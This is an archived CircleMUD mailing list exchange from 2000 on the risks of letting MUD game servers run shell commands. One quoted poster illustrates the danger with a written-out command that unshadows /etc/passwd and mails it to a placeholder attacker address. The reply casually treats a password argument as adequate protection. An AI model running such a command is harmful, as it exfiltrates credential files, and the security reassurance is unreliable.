---- Begin Original Message ----
From: The Merciless Lord of Everything <serces@mud.dk>
Sent: Fri, 8 Sep 2000 12:25:30 +0200
To: CIRCLE@post.queensu.ca
Subject: Re: [CIRCLE] Ports
-snip-
While I'm on the ranting side :), a mud should imho not be able to
grab
onto system files. I've seen muds offer "ps -axu" and return the
information to the user, even muds that offer the ability to execute
arbitrary commands on the server. Imagine the following in conjunciton
with a mud that runs as root (and offers the above arbitrary)
Mr. Evilguy hacks the admins passwords (grabs it or however Evilguys
get
it :), and does a
"execute pwunconv && mail evilguy@foo.bar < /etc/passwd && pwconv"
Voila.. mr evilguy now has a complete listing of usernames and
passwords.
-snip-
/S
Sir Alec Guinness
- May the force be with you, Always!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Hrmm, I beg to differ with you here. I installed pgrun.c written by
Petr Vilim and have found it very useful. After contacting Petr, I
installed a "make" command that allows me to compile the MUD without
having to enter the shell. When you edit the source via save-to-ftp,
you find this more than a bit handy.
Security is not that hard, as long as you protect each command with a
final argument that contains a password. Of course, you want to check
the player's idnum first.
If a hacker is out to get you, there isn't much you can do. I refuse
to stay hudled up in a corner, cowering in fright while life passes
me by.
-FIRE
Get your Free E-mail at http://randor.zzn.com
____________________________________________________________
Get your own Web-Based E-mail Service at http://www.zzn.com
+------------------------------------------------------------+
| Ensure that you have read the CircleMUD Mailing List FAQ: |
| http://qsilver.queensu.ca/~fletchra/Circle/list-faq.html |
+------------------------------------------------------------+
This archive was generated by hypermail 2b30 : 04/11/01 PDT